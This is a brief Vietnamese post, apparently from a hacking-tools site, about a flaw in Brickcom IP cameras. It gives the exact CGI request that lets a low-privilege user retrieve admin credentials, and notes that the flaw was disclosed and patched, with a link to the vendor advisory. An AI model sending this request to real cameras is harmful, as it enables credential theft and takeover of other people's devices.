Tool: https://tromcap.com/dvr-exploit-hack-pass-brickcom-ip-camera/
Giới thiệu:
Nhà cung cấp: http://www.brickcom.com
Cách thức:
Lấy thông tin quản trị Admin của IP camera chỉ cần quyền User (dù không được phần quyền cho phép xem và cấu hình) mặc định đi kèm
Url dùng để khai thác: http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers
Lỗi đã được công bố và cập nhật firmware để fix lỗi
Chi tiết xem tại : https://www.brickcom.com/news/productCERT_security_advisorie.php
Thanks, Emiliano Ipar
